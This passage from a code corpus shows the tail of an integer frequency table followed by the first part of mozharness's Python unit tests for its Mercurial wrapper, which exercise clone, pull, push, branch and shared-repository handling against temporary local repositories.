4163,3454,6504,6112,4009,4450,6113,4658,6297,6114,3035,6505,6115,3995,4904,4739,
4563,4942,4110,5040,3661,3928,5362,3674,6506,5292,3612,4791,5565,4149,5983,5328,
5259,5021,4725,4577,4564,4517,4364,6298,5405,4578,5260,4594,4156,4157,5453,3592,
3491,6507,5127,5512,4709,4922,5984,5701,4726,4289,6508,4015,6116,5128,4628,3424,
4241,5779,6299,4905,6509,6510,5454,5702,5780,6300,4365,4923,3971,6511,5161,3270,
3158,5985,4100, 867,5129,5703,6117,5363,3695,3301,5513,4467,6118,6512,5455,4232,
4242,4629,6513,3959,4478,6514,5514,5329,5986,4850,5162,5566,3846,4694,6119,5456,
4869,5781,3779,6301,5704,5987,5515,4710,6302,5882,6120,4392,5364,5705,6515,6121,
6516,6517,3736,5988,5457,5989,4695,2457,5883,4551,5782,6303,6304,6305,5130,4971,
6122,5163,6123,4870,3263,5365,3150,4871,6518,6306,5783,5069,5706,3513,3498,4409,
5330,5632,5366,5458,5459,3991,5990,4502,3324,5991,5784,3696,4518,5633,4119,6519,
4630,5634,4417,5707,4832,5992,3418,6124,5993,5567,4768,5218,6520,4595,3458,5367,
6125,5635,6126,4202,6521,4740,4924,6307,3981,4069,4385,6308,3883,2675,4051,3834,
4302,4483,5568,5994,4972,4101,5368,6309,5164,5884,3922,6127,6522,6523,5261,5460,
5187,4164,5219,3538,5516,4111,3524,5995,6310,6311,5369,3181,3386,2484,5188,3464,
5569,3627,5708,6524,5406,5165,4677,4492,6312,4872,4851,5885,4468,5996,6313,5709,
5710,6128,2470,5886,6314,5293,4882,5785,3325,5461,5101,6129,5711,5786,6525,4906,
6526,6527,4418,5887,5712,4808,2907,3701,5713,5888,6528,3765,5636,5331,6529,6530,
3593,5889,3637,4943,3692,5714,5787,4925,6315,6130,5462,4405,6131,6132,6316,5262,
6531,6532,5715,3859,5716,5070,4696,5102,3929,5788,3987,4792,5997,6533,6534,3920,
4809,5000,5998,6535,2974,5370,6317,5189,5263,5717,3826,6536,3953,5001,4883,3190,
5463,5890,4973,5999,4741,6133,6134,3607,5570,6000,4711,3362,3630,4552,5041,6318,
6001,2950,2953,5637,4646,5371,4944,6002,2044,4120,3429,6319,6537,5103,4833,6538,
6539,4884,4647,3884,6003,6004,4758,3835,5220,5789,4565,5407,6540,6135,5294,4697,
4852,6320,6321,3206,4907,6541,6322,4945,6542,6136,6543,6323,6005,4631,3519,6544,
5891,6545,5464,3784,5221,6546,5571,4659,6547,6324,6137,5190,6548,3853,6549,4016,
4834,3954,6138,5332,3827,4017,3210,3546,4469,5408,5718,3505,4648,5790,5131,5638,
5791,5465,4727,4318,6325,6326,5792,4553,4010,4698,3439,4974,3638,4335,3085,6006,
5104,5042,5166,5892,5572,6327,4356,4519,5222,5573,5333,5793,5043,6550,5639,5071,
4503,6328,6139,6551,6140,3914,3901,5372,6007,5640,4728,4793,3976,3836,4885,6552,
4127,6553,4451,4102,5002,6554,3686,5105,6555,5191,5072,5295,4611,5794,5296,6556,
5893,5264,5894,4975,5466,5265,4699,4976,4370,4056,3492,5044,4886,6557,5795,4432,
4769,4357,5467,3940,4660,4290,6141,4484,4770,4661,3992,6329,4025,4662,5022,4632,
4835,4070,5297,4663,4596,5574,5132,5409,5895,6142,4504,5192,4664,5796,5896,3885,
5575,5797,5023,4810,5798,3732,5223,4712,5298,4084,5334,5468,6143,4052,4053,4336,
4977,4794,6558,5335,4908,5576,5224,4233,5024,4128,5469,5225,4873,6008,5045,4729,
4742,4633,3675,4597,6559,5897,5133,5577,5003,5641,5719,6330,6560,3017,2382,3854,
4406,4811,6331,4393,3964,4946,6561,2420,3722,6562,4926,4378,3247,1736,4442,6332,
5134,6333,5226,3996,2918,5470,4319,4003,4598,4743,4744,4485,3785,3902,5167,5004,
5373,4394,5898,6144,4874,1793,3997,6334,4085,4214,5106,5642,4909,5799,6009,4419,
4189,3330,5899,4165,4420,5299,5720,5227,3347,6145,4081,6335,2876,3930,6146,3293,
3786,3910,3998,5900,5300,5578,2840,6563,5901,5579,6147,3531,5374,6564,6565,5580,
4759,5375,6566,6148,3559,5643,6336,6010,5517,6337,6338,5721,5902,3873,6011,6339,
6567,5518,3868,3649,5722,6568,4771,4947,6569,6149,4812,6570,2853,5471,6340,6341,
5644,4795,6342,6012,5723,6343,5724,6013,4349,6344,3160,6150,5193,4599,4514,4493,
5168,4320,6345,4927,3666,4745,5169,5903,5005,4928,6346,5725,6014,4730,4203,5046,
4948,3395,5170,6015,4150,6016,5726,5519,6347,5047,3550,6151,6348,4197,4310,5904,
6571,5581,2965,6152,4978,3960,4291,5135,6572,5301,5727,4129,4026,5905,4853,5728,
5472,6153,6349,4533,2700,4505,5336,4678,3583,5073,2994,4486,3043,4554,5520,6350,
6017,5800,4487,6351,3931,4103,5376,6352,4011,4321,4311,4190,5136,6018,3988,3233,
4350,5906,5645,4198,6573,5107,3432,4191,3435,5582,6574,4139,5410,6353,5411,3944,
5583,5074,3198,6575,6354,4358,6576,5302,4600,5584,5194,5412,6577,6578,5585,5413,
5303,4248,5414,3879,4433,6579,4479,5025,4854,5415,6355,4760,4772,3683,2978,4700,
3797,4452,3965,3932,3721,4910,5801,6580,5195,3551,5907,3221,3471,3029,6019,3999,
5908,5909,5266,5267,3444,3023,3828,3170,4796,5646,4979,4259,6356,5647,5337,3694,
6357,5648,5338,4520,4322,5802,3031,3759,4071,6020,5586,4836,4386,5048,6581,3571,
4679,4174,4949,6154,4813,3787,3402,3822,3958,3215,3552,5268,4387,3933,4950,4359,
6021,5910,5075,3579,6358,4234,4566,5521,6359,3613,5049,6022,5911,3375,3702,3178,
4911,5339,4521,6582,6583,4395,3087,3811,5377,6023,6360,6155,4027,5171,5649,4421,
4249,2804,6584,2270,6585,4000,4235,3045,6156,5137,5729,4140,4312,3886,6361,4330,
6157,4215,6158,3500,3676,4929,4331,3713,4930,5912,4265,3776,3368,5587,4470,4855,
3038,4980,3631,6159,6160,4132,4680,6161,6362,3923,4379,5588,4255,6586,4121,6587,
6363,4649,6364,3288,4773,4774,6162,6024,6365,3543,6588,4274,3107,3737,5050,5803,
4797,4522,5589,5051,5730,3714,4887,5378,4001,4523,6163,5026,5522,4701,4175,2791,
3760,6589,5473,4224,4133,3847,4814,4815,4775,3259,5416,6590,2738,6164,6025,5304,
3733,5076,5650,4816,5590,6591,6165,6592,3934,5269,6593,3396,5340,6594,5804,3445,
3602,4042,4488,5731,5732,3525,5591,4601,5196,6166,6026,5172,3642,4612,3202,4506,
4798,6366,3818,5108,4303,5138,5139,4776,3332,4304,2915,3415,4434,5077,5109,4856,
2879,5305,4817,6595,5913,3104,3144,3903,4634,5341,3133,5110,5651,5805,6167,4057,
5592,2945,4371,5593,6596,3474,4182,6367,6597,6168,4507,4279,6598,2822,6599,4777,
4713,5594,3829,6169,3887,5417,6170,3653,5474,6368,4216,2971,5228,3790,4579,6369,
5733,6600,6601,4951,4746,4555,6602,5418,5475,6027,3400,4665,5806,6171,4799,6028,
5052,6172,3343,4800,4747,5006,6370,4556,4217,5476,4396,5229,5379,5477,3839,5914,
5652,5807,4714,3068,4635,5808,6173,5342,4192,5078,5419,5523,5734,6174,4557,6175,
4602,6371,6176,6603,5809,6372,5735,4260,3869,5111,5230,6029,5112,6177,3126,4681,
5524,5915,2706,3563,4748,3130,6178,4018,5525,6604,6605,5478,4012,4837,6606,4534,
4193,5810,4857,3615,5479,6030,4082,3697,3539,4086,5270,3662,4508,4931,5916,4912,
5811,5027,3888,6607,4397,3527,3302,3798,2775,2921,2637,3966,4122,4388,4028,4054,
1633,4858,5079,3024,5007,3982,3412,5736,6608,3426,3236,5595,3030,6179,3427,3336,
3279,3110,6373,3874,3039,5080,5917,5140,4489,3119,6374,5812,3405,4494,6031,4666,
4141,6180,4166,6032,5813,4981,6609,5081,4422,4982,4112,3915,5653,3296,3983,6375,
4266,4410,5654,6610,6181,3436,5082,6611,5380,6033,3819,5596,4535,5231,5306,5113,
6612,4952,5918,4275,3113,6613,6376,6182,6183,5814,3073,4731,4838,5008,3831,6614,
4888,3090,3848,4280,5526,5232,3014,5655,5009,5737,5420,5527,6615,5815,5343,5173,
5381,4818,6616,3151,4953,6617,5738,2796,3204,4360,2989,4281,5739,5174,5421,5197,
3132,5141,3849,5142,5528,5083,3799,3904,4839,5480,2880,4495,3448,6377,6184,5271,
5919,3771,3193,6034,6035,5920,5010,6036,5597,6037,6378,6038,3106,5422,6618,5423,
5424,4142,6619,4889,5084,4890,4313,5740,6620,3437,5175,5307,5816,4199,5198,5529,
5817,5199,5656,4913,5028,5344,3850,6185,2955,5272,5011,5818,4567,4580,5029,5921,
3616,5233,6621,6622,6186,4176,6039,6379,6380,3352,5200,5273,2908,5598,5234,3837,
5308,6623,6624,5819,4496,4323,5309,5201,6625,6626,4983,3194,3838,4167,5530,5922,
5274,6381,6382,3860,3861,5599,3333,4292,4509,6383,3553,5481,5820,5531,4778,6187,
3955,3956,4324,4389,4218,3945,4325,3397,2681,5923,4779,5085,4019,5482,4891,5382,
5383,6040,4682,3425,5275,4094,6627,5310,3015,5483,5657,4398,5924,3168,4819,6628,
5925,6629,5532,4932,4613,6041,6630,4636,6384,4780,4204,5658,4423,5821,3989,4683,
5822,6385,4954,6631,5345,6188,5425,5012,5384,3894,6386,4490,4104,6632,5741,5053,
6633,5823,5926,5659,5660,5927,6634,5235,5742,5824,4840,4933,4820,6387,4859,5928,
4955,6388,4143,3584,5825,5346,5013,6635,5661,6389,5014,5484,5743,4337,5176,5662,
6390,2836,6391,3268,6392,6636,6042,5236,6637,4158,6638,5744,5663,4471,5347,3663,
4123,5143,4293,3895,6639,6640,5311,5929,5826,3800,6189,6393,6190,5664,5348,3554,
3594,4749,4603,6641,5385,4801,6043,5827,4183,6642,5312,5426,4761,6394,5665,6191,
4715,2669,6643,6644,5533,3185,5427,5086,5930,5931,5386,6192,6044,6645,4781,4013,
5745,4282,4435,5534,4390,4267,6045,5746,4984,6046,2743,6193,3501,4087,5485,5932,
5428,4184,4095,5747,4061,5054,3058,3862,5933,5600,6646,5144,3618,6395,3131,5055,
5313,6396,4650,4956,3855,6194,3896,5202,4985,4029,4225,6195,6647,5828,5486,5829,
3589,3002,6648,6397,4782,5276,6649,6196,6650,4105,3803,4043,5237,5830,6398,4096,
3643,6399,3528,6651,4453,3315,4637,6652,3984,6197,5535,3182,3339,6653,3096,2660,
6400,6654,3449,5934,4250,4236,6047,6401,5831,6655,5487,3753,4062,5832,6198,6199,
6656,3766,6657,3403,4667,6048,6658,4338,2897,5833,3880,2797,3780,4326,6659,5748,
5015,6660,5387,4351,5601,4411,6661,3654,4424,5935,4339,4072,5277,4568,5536,6402,
6662,5238,6663,5349,5203,6200,5204,6201,5145,4536,5016,5056,4762,5834,4399,4957,
6202,6403,5666,5749,6664,4340,6665,5936,5177,5667,6666,6667,3459,4668,6404,6668,
6669,4543,6203,6670,4276,6405,4480,5537,6671,4614,5205,5668,6672,3348,2193,4763,
6406,6204,5937,5602,4177,5669,3419,6673,4020,6205,4443,4569,5388,3715,3639,6407,
6049,4058,6206,6674,5938,4544,6050,4185,4294,4841,4651,4615,5488,6207,6408,6051,
5178,3241,3509,5835,6208,4958,5836,4341,5489,5278,6209,2823,5538,5350,5206,5429,
6675,4638,4875,4073,3516,4684,4914,4860,5939,5603,5389,6052,5057,3237,5490,3791,
6676,6409,6677,4821,4915,4106,5351,5058,4243,5539,4244,5604,4842,4916,5239,3028,
3716,5837,5114,5605,5390,5940,5430,6210,4332,6678,5540,4732,3667,3840,6053,4305,
3408,5670,5541,6410,2744,5240,5750,6679,3234,5606,6680,5607,5671,3608,4283,4159,
4400,5352,4783,6681,6411,6682,4491,4802,6211,6412,5941,6413,6414,5542,5751,6683,
4669,3734,5942,6684,6415,5943,5059,3328,4670,4144,4268,6685,6686,6687,6688,4372,
3603,6689,5944,5491,4373,3440,6416,5543,4784,4822,5608,3792,4616,5838,5672,3514,
5391,6417,4892,6690,4639,6691,6054,5673,5839,6055,6692,6056,5392,6212,4038,5544,
5674,4497,6057,6693,5840,4284,5675,4021,4545,5609,6418,4454,6419,6213,4113,4472,
5314,3738,5087,5279,4074,5610,4959,4063,3179,4750,6058,6420,6214,3476,4498,4716,
5431,4960,4685,6215,5241,6694,6421,6216,6695,5841,5945,6422,3748,5946,5179,3905,
5752,5545,5947,4374,6217,4455,6423,4412,6218,4803,5353,6696,3832,5280,6219,4327,
4702,6220,6221,6059,4652,5432,6424,3749,4751,6425,5753,4986,5393,4917,5948,5030,
5754,4861,4733,6426,4703,6697,6222,4671,5949,4546,4961,5180,6223,5031,3316,5281,
6698,4862,4295,4934,5207,3644,6427,5842,5950,6428,6429,4570,5843,5282,6430,6224,
5088,3239,6060,6699,5844,5755,6061,6431,2701,5546,6432,5115,5676,4039,3993,3327,
4752,4425,5315,6433,3941,6434,5677,4617,4604,3074,4581,6225,5433,6435,6226,6062,
4823,5756,5116,6227,3717,5678,4717,5845,6436,5679,5846,6063,5847,6064,3977,3354,
6437,3863,5117,6228,5547,5394,4499,4524,6229,4605,6230,4306,4500,6700,5951,6065,
3693,5952,5089,4366,4918,6701,6231,5548,6232,6702,6438,4704,5434,6703,6704,5953,
4168,6705,5680,3420,6706,5242,4407,6066,3812,5757,5090,5954,4672,4525,3481,5681,
4618,5395,5354,5316,5955,6439,4962,6707,4526,6440,3465,4673,6067,6441,5682,6708,
5435,5492,5758,5683,4619,4571,4674,4804,4893,4686,5493,4753,6233,6068,4269,6442,
6234,5032,4705,5146,5243,5208,5848,6235,6443,4963,5033,4640,4226,6236,5849,3387,
6444,6445,4436,4437,5850,4843,5494,4785,4894,6709,4361,6710,5091,5956,3331,6237,
4987,5549,6069,6711,4342,3517,4473,5317,6070,6712,6071,4706,6446,5017,5355,6713,
6714,4988,5436,6447,4734,5759,6715,4735,4547,4456,4754,6448,5851,6449,6450,3547,
5852,5318,6451,6452,5092,4205,6716,6238,4620,4219,5611,6239,6072,4481,5760,5957,
5958,4059,6240,6453,4227,4537,6241,5761,4030,4186,5244,5209,3761,4457,4876,3337,
5495,5181,6242,5959,5319,5612,5684,5853,3493,5854,6073,4169,5613,5147,4895,6074,
5210,6717,5182,6718,3830,6243,2798,3841,6075,6244,5855,5614,3604,4606,5496,5685,
5118,5356,6719,6454,5960,5357,5961,6720,4145,3935,4621,5119,5962,4261,6721,6455,
4786,5963,4375,4582,6245,6246,6247,6076,5437,4877,5856,3376,4380,6248,4160,6722,
5148,6456,5211,6457,6723,4718,6458,6724,6249,5358,4044,3297,6459,6250,5857,5615,
5497,5245,6460,5498,6725,6251,6252,5550,3793,5499,2959,5396,6461,6462,4572,5093,
5500,5964,3806,4146,6463,4426,5762,5858,6077,6253,4755,3967,4220,5965,6254,4989,
5501,6464,4352,6726,6078,4764,2290,5246,3906,5438,5283,3767,4964,2861,5763,5094,
6255,6256,4622,5616,5859,5860,4707,6727,4285,4708,4824,5617,6257,5551,4787,5212,
4965,4935,4687,6465,6728,6466,5686,6079,3494,4413,2995,5247,5966,5618,6729,5967,
5764,5765,5687,5502,6730,6731,6080,5397,6467,4990,6258,6732,4538,5060,5619,6733,
4719,5688,5439,5018,5149,5284,5503,6734,6081,4607,6259,5120,3645,5861,4583,6260,
4584,4675,5620,4098,5440,6261,4863,2379,3306,4585,5552,5689,4586,5285,6735,4864,
6736,5286,6082,6737,4623,3010,4788,4381,4558,5621,4587,4896,3698,3161,5248,4353,
4045,6262,3754,5183,4588,6738,6263,6739,6740,5622,3936,6741,6468,6742,6264,5095,
6469,4991,5968,6743,4992,6744,6083,4897,6745,4256,5766,4307,3108,3968,4444,5287,
3889,4343,6084,4510,6085,4559,6086,4898,5969,6746,5623,5061,4919,5249,5250,5504,
5441,6265,5320,4878,3242,5862,5251,3428,6087,6747,4237,5624,5442,6266,5553,4539,
6748,2585,3533,5398,4262,6088,5150,4736,4438,6089,6267,5505,4966,6749,6268,6750,
6269,5288,5554,3650,6090,6091,4624,6092,5690,6751,5863,4270,5691,4277,5555,5864,
6752,5692,4720,4865,6470,5151,4688,4825,6753,3094,6754,6471,3235,4653,6755,5213,
5399,6756,3201,4589,5865,4967,6472,5866,6473,5019,3016,6757,5321,4756,3957,4573,
6093,4993,5767,4721,6474,6758,5625,6759,4458,6475,6270,6760,5556,4994,5214,5252,
6271,3875,5768,6094,5034,5506,4376,5769,6761,2120,6476,5253,5770,6762,5771,5970,
3990,5971,5557,5558,5772,6477,6095,2787,4641,5972,5121,6096,6097,6272,6763,3703,
5867,5507,6273,4206,6274,4789,6098,6764,3619,3646,3833,3804,2394,3788,4936,3978,
4866,4899,6099,6100,5559,6478,6765,3599,5868,6101,5869,5870,6275,6766,4527,6767)
# flake8: noqa
| gpl-3.0 |
lissyx/build-mozharness | test/test_base_vcs_mercurial.py | 11 | 22114 | import os
import platform
import shutil
import tempfile
import unittest
import mozharness.base.errors as errors
import mozharness.base.vcs.mercurial as mercurial
test_string = '''foo
bar
baz'''
HG = ['hg'] + mercurial.HG_OPTIONS
# Known default .hgrc
os.environ['HGRCPATH'] = os.path.join(os.path.dirname(__file__), 'helper_files', '.hgrc')
def cleanup():
if os.path.exists('test_logs'):
shutil.rmtree('test_logs')
if os.path.exists('test_dir'):
if os.path.isdir('test_dir'):
shutil.rmtree('test_dir')
else:
os.remove('test_dir')
for filename in ('localconfig.json', 'localconfig.json.bak'):
if os.path.exists(filename):
os.remove(filename)
def get_mercurial_vcs_obj():
m = mercurial.MercurialVCS()
m.config = {}
return m
def get_revisions(dest):
m = get_mercurial_vcs_obj()
retval = []
for rev in m.get_output_from_command(HG + ['log', '-R', dest, '--template', '{node|short}\n']).split('\n'):
rev = rev.strip()
if not rev:
continue
retval.append(rev)
return retval
class TestMakeAbsolute(unittest.TestCase):
# _make_absolute() doesn't play nicely with windows/msys paths.
# TODO: fix _make_absolute, write it out of the picture, or determine
# that it's not needed on windows.
if platform.system() not in ("Windows",):
def test_absolute_path(self):
m = get_mercurial_vcs_obj()
self.assertEquals(m._make_absolute("/foo/bar"), "/foo/bar")
def test_relative_path(self):
m = get_mercurial_vcs_obj()
self.assertEquals(m._make_absolute("foo/bar"), os.path.abspath("foo/bar"))
def test_HTTP_paths(self):
m = get_mercurial_vcs_obj()
self.assertEquals(m._make_absolute("http://foo/bar"), "http://foo/bar")
def test_absolute_file_path(self):
m = get_mercurial_vcs_obj()
self.assertEquals(m._make_absolute("file:///foo/bar"), "file:///foo/bar")
def test_relative_file_path(self):
m = get_mercurial_vcs_obj()
self.assertEquals(m._make_absolute("file://foo/bar"), "file://%s/foo/bar" % os.getcwd())
class TestHg(unittest.TestCase):
def _init_hg_repo(self, hg_obj, repodir):
hg_obj.run_command(["bash",
os.path.join(os.path.dirname(__file__),
"helper_files", "init_hgrepo.sh"),
repodir])
def setUp(self):
self.tmpdir = tempfile.mkdtemp()
self.repodir = os.path.join(self.tmpdir, 'repo')
m = get_mercurial_vcs_obj()
self._init_hg_repo(m, self.repodir)
self.revisions = get_revisions(self.repodir)
self.wc = os.path.join(self.tmpdir, 'wc')
self.pwd = os.getcwd()
def tearDown(self):
shutil.rmtree(self.tmpdir)
os.chdir(self.pwd)
def test_get_branch(self):
m = get_mercurial_vcs_obj()
m.clone(self.repodir, self.wc)
b = m.get_branch_from_path(self.wc)
self.assertEquals(b, 'default')
def test_get_branches(self):
m = get_mercurial_vcs_obj()
m.clone(self.repodir, self.wc)
branches = m.get_branches_from_path(self.wc)
self.assertEquals(sorted(branches), sorted(["branch2", "default"]))
def test_clone(self):
m = get_mercurial_vcs_obj()
rev = m.clone(self.repodir, self.wc, update_dest=False)
self.assertEquals(rev, None)
self.assertEquals(self.revisions, get_revisions(self.wc))
self.assertEquals(sorted(os.listdir(self.wc)), ['.hg'])
def test_clone_into_non_empty_dir(self):
m = get_mercurial_vcs_obj()
m.mkdir_p(self.wc)
open(os.path.join(self.wc, 'test.txt'), 'w').write('hello')
m.clone(self.repodir, self.wc, update_dest=False)
self.failUnless(not os.path.exists(os.path.join(self.wc, 'test.txt')))
def test_clone_update(self):
m = get_mercurial_vcs_obj()
rev = m.clone(self.repodir, self.wc, update_dest=True)
self.assertEquals(rev, self.revisions[0])
def test_clone_branch(self):
m = get_mercurial_vcs_obj()
m.clone(self.repodir, self.wc, branch='branch2',
update_dest=False)
# On hg 1.6, we should only have a subset of the revisions
if m.hg_ver() >= (1, 6, 0):
self.assertEquals(self.revisions[1:],
get_revisions(self.wc))
else:
self.assertEquals(self.revisions,
get_revisions(self.wc))
def test_clone_update_branch(self):
m = get_mercurial_vcs_obj()
rev = m.clone(self.repodir, os.path.join(self.tmpdir, 'wc'),
branch="branch2", update_dest=True)
self.assertEquals(rev, self.revisions[1], self.revisions)
def test_clone_revision(self):
m = get_mercurial_vcs_obj()
m.clone(self.repodir, self.wc,
revision=self.revisions[0], update_dest=False)
# We'll only get a subset of the revisions
self.assertEquals(self.revisions[:1] + self.revisions[2:],
get_revisions(self.wc))
def test_update_revision(self):
m = get_mercurial_vcs_obj()
rev = m.clone(self.repodir, self.wc, update_dest=False)
self.assertEquals(rev, None)
rev = m.update(self.wc, revision=self.revisions[1])
self.assertEquals(rev, self.revisions[1])
def test_pull(self):
m = get_mercurial_vcs_obj()
# Clone just the first rev
m.clone(self.repodir, self.wc, revision=self.revisions[-1], update_dest=False)
self.assertEquals(get_revisions(self.wc), self.revisions[-1:])
# Now pull in new changes
rev = m.pull(self.repodir, self.wc, update_dest=False)
self.assertEquals(rev, None)
self.assertEquals(get_revisions(self.wc), self.revisions)
def test_pull_revision(self):
m = get_mercurial_vcs_obj()
# Clone just the first rev
m.clone(self.repodir, self.wc, revision=self.revisions[-1], update_dest=False)
self.assertEquals(get_revisions(self.wc), self.revisions[-1:])
# Now pull in just the last revision
rev = m.pull(self.repodir, self.wc, revision=self.revisions[0], update_dest=False)
self.assertEquals(rev, None)
# We'll be missing the middle revision (on another branch)
self.assertEquals(get_revisions(self.wc), self.revisions[:1] + self.revisions[2:])
def test_pull_branch(self):
m = get_mercurial_vcs_obj()
# Clone just the first rev
m.clone(self.repodir, self.wc, revision=self.revisions[-1], update_dest=False)
self.assertEquals(get_revisions(self.wc), self.revisions[-1:])
# Now pull in the other branch
rev = m.pull(self.repodir, self.wc, branch="branch2", update_dest=False)
self.assertEquals(rev, None)
# On hg 1.6, we'll be missing the last revision (on another branch)
if m.hg_ver() >= (1, 6, 0):
self.assertEquals(get_revisions(self.wc), self.revisions[1:])
else:
self.assertEquals(get_revisions(self.wc), self.revisions)
def test_pull_unrelated(self):
m = get_mercurial_vcs_obj()
# Create a new repo
repo2 = os.path.join(self.tmpdir, 'repo2')
self._init_hg_repo(m, repo2)
self.assertNotEqual(self.revisions, get_revisions(repo2))
# Clone the original repo
m.clone(self.repodir, self.wc, update_dest=False)
# Hide the wanted error
m.config = {'log_to_console': False}
# Try and pull in changes from the new repo
self.assertRaises(mercurial.VCSException, m.pull, repo2, self.wc, update_dest=False)
def test_share_unrelated(self):
m = get_mercurial_vcs_obj()
# Create a new repo
repo2 = os.path.join(self.tmpdir, 'repo2')
self._init_hg_repo(m, repo2)
self.assertNotEqual(self.revisions, get_revisions(repo2))
share_base = os.path.join(self.tmpdir, 'share')
# Clone the original repo
m.vcs_config = {'repo': self.repodir, 'dest': self.wc, 'vcs_share_base': share_base}
m.ensure_repo_and_revision()
# Clone the new repo
m = get_mercurial_vcs_obj()
m.vcs_config = {'repo': repo2, 'dest': self.wc, 'vcs_share_base': share_base}
m.ensure_repo_and_revision()
self.assertEquals(get_revisions(self.wc), get_revisions(repo2))
def test_share_reset(self):
m = get_mercurial_vcs_obj()
share_base = os.path.join(self.tmpdir, 'share')
m.vcs_config = {'repo': self.repodir, 'dest': self.wc, 'vcs_share_base': share_base}
# Clone the original repo
m.ensure_repo_and_revision()
old_revs = self.revisions[:]
# Reset the repo
self._init_hg_repo(m, self.repodir)
self.assertNotEqual(old_revs, get_revisions(self.repodir))
# Try and update our working copy
m = get_mercurial_vcs_obj()
m.vcs_config = {'repo': self.repodir, 'dest': self.wc, 'vcs_share_base': share_base}
m.config = {'log_to_console': False}
m.ensure_repo_and_revision()
self.assertEquals(get_revisions(self.repodir), get_revisions(self.wc))
self.assertNotEqual(old_revs, get_revisions(self.wc))
def test_push(self):
m = get_mercurial_vcs_obj()
m.clone(self.repodir, self.wc, revision=self.revisions[-2])
m.push(src=self.repodir, remote=self.wc)
self.assertEquals(get_revisions(self.wc), self.revisions)
def test_push_with_branch(self):
m = get_mercurial_vcs_obj()
if m.hg_ver() >= (1, 6, 0):
m.clone(self.repodir, self.wc, revision=self.revisions[-1])
m.push(src=self.repodir, remote=self.wc, branch='branch2')
m.push(src=self.repodir, remote=self.wc, branch='default')
self.assertEquals(get_revisions(self.wc), self.revisions)
def test_push_with_revision(self):
m = get_mercurial_vcs_obj()
m.clone(self.repodir, self.wc, revision=self.revisions[-2])
m.push(src=self.repodir, remote=self.wc, revision=self.revisions[-1])
self.assertEquals(get_revisions(self.wc), self.revisions[-2:])
def test_mercurial(self):
m = get_mercurial_vcs_obj()
m.vcs_config = {'repo': self.repodir, 'dest': self.wc}
m.ensure_repo_and_revision()
rev = m.ensure_repo_and_revision()
self.assertEquals(rev, self.revisions[0])
def test_push_new_branches_not_allowed(self):
m = get_mercurial_vcs_obj()
m.clone(self.repodir, self.wc, revision=self.revisions[0])
# Hide the wanted error
m.config = {'log_to_console': False}
self.assertRaises(Exception, m.push, self.repodir, self.wc, push_new_branches=False)
def test_mercurial_with_new_share(self):
m = get_mercurial_vcs_obj()
share_base = os.path.join(self.tmpdir, 'share')
sharerepo = os.path.join(share_base, self.repodir.lstrip("/"))
os.mkdir(share_base)
m.vcs_config = {'repo': self.repodir, 'dest': self.wc, 'vcs_share_base': share_base}
m.ensure_repo_and_revision()
self.assertEquals(get_revisions(self.repodir), get_revisions(self.wc))
self.assertEquals(get_revisions(self.repodir), get_revisions(sharerepo))
def test_mercurial_with_share_base_in_env(self):
share_base = os.path.join(self.tmpdir, 'share')
sharerepo = os.path.join(share_base, self.repodir.lstrip("/"))
os.mkdir(share_base)
try:
os.environ['HG_SHARE_BASE_DIR'] = share_base
m = get_mercurial_vcs_obj()
m.vcs_config = {'repo': self.repodir, 'dest': self.wc}
m.ensure_repo_and_revision()
self.assertEquals(get_revisions(self.repodir), get_revisions(self.wc))
self.assertEquals(get_revisions(self.repodir), get_revisions(sharerepo))
finally:
del os.environ['HG_SHARE_BASE_DIR']
def test_mercurial_with_existing_share(self):
m = get_mercurial_vcs_obj()
share_base = os.path.join(self.tmpdir, 'share')
sharerepo = os.path.join(share_base, self.repodir.lstrip("/"))
os.mkdir(share_base)
m.vcs_config = {'repo': self.repodir, 'dest': sharerepo}
m.ensure_repo_and_revision()
open(os.path.join(self.repodir, 'test.txt'), 'w').write('hello!')
m.run_command(HG + ['add', 'test.txt'], cwd=self.repodir)
m.run_command(HG + ['commit', '-m', 'adding changeset'], cwd=self.repodir)
m = get_mercurial_vcs_obj()
m.vcs_config = {'repo': self.repodir, 'dest': self.wc, 'vcs_share_base': share_base}
m.ensure_repo_and_revision()
self.assertEquals(get_revisions(self.repodir), get_revisions(self.wc))
self.assertEquals(get_revisions(self.repodir), get_revisions(sharerepo))
def test_mercurial_relative_dir(self):
m = get_mercurial_vcs_obj()
repo = os.path.basename(self.repodir)
wc = os.path.basename(self.wc)
m.vcs_config = {'repo': repo, 'dest': wc, 'revision': self.revisions[-1]}
m.chdir(os.path.dirname(self.repodir))
try:
rev = m.ensure_repo_and_revision()
self.assertEquals(rev, self.revisions[-1])
m.info("Creating test.txt")
open(os.path.join(self.wc, 'test.txt'), 'w').write("hello!")
m = get_mercurial_vcs_obj()
m.vcs_config = {'repo': repo, 'dest': wc, 'revision': self.revisions[0]}
rev = m.ensure_repo_and_revision()
self.assertEquals(rev, self.revisions[0])
# Make sure our local file didn't go away
self.failUnless(os.path.exists(os.path.join(self.wc, 'test.txt')))
finally:
m.chdir(self.pwd)
def test_mercurial_update_tip(self):
m = get_mercurial_vcs_obj()
m.vcs_config = {'repo': self.repodir, 'dest': self.wc, 'revision': self.revisions[-1]}
rev = m.ensure_repo_and_revision()
self.assertEquals(rev, self.revisions[-1])
open(os.path.join(self.wc, 'test.txt'), 'w').write("hello!")
m = get_mercurial_vcs_obj()
m.vcs_config = {'repo': self.repodir, 'dest': self.wc}
rev = m.ensure_repo_and_revision()
self.assertEquals(rev, self.revisions[0])
# Make sure our local file didn't go away
self.failUnless(os.path.exists(os.path.join(self.wc, 'test.txt')))
def test_mercurial_update_rev(self):
m = get_mercurial_vcs_obj()
m.vcs_config = {'repo': self.repodir, 'dest': self.wc, 'revision': self.revisions[-1]}
rev = m.ensure_repo_and_revision()
self.assertEquals(rev, self.revisions[-1])
open(os.path.join(self.wc, 'test.txt'), 'w').write("hello!")
m = get_mercurial_vcs_obj()
m.vcs_config = {'repo': self.repodir, 'dest': self.wc, 'revision': self.revisions[0]}
rev = m.ensure_repo_and_revision()
self.assertEquals(rev, self.revisions[0])
# Make sure our local file didn't go away
self.failUnless(os.path.exists(os.path.join(self.wc, 'test.txt')))
# TODO: this test doesn't seem to be compatible with mercurial()'s
# share() usage, and fails when HG_SHARE_BASE_DIR is set
def test_mercurial_change_repo(self):
# Create a new repo
old_env = os.environ.copy()
if 'HG_SHARE_BASE_DIR' in os.environ:
del os.environ['HG_SHARE_BASE_DIR']
m = get_mercurial_vcs_obj()
try:
repo2 = os.path.join(self.tmpdir, 'repo2')
self._init_hg_repo(m, repo2)
self.assertNotEqual(self.revisions, get_revisions(repo2))
# Clone the original repo
m.vcs_config = {'repo': self.repodir, 'dest': self.wc}
m.ensure_repo_and_revision()
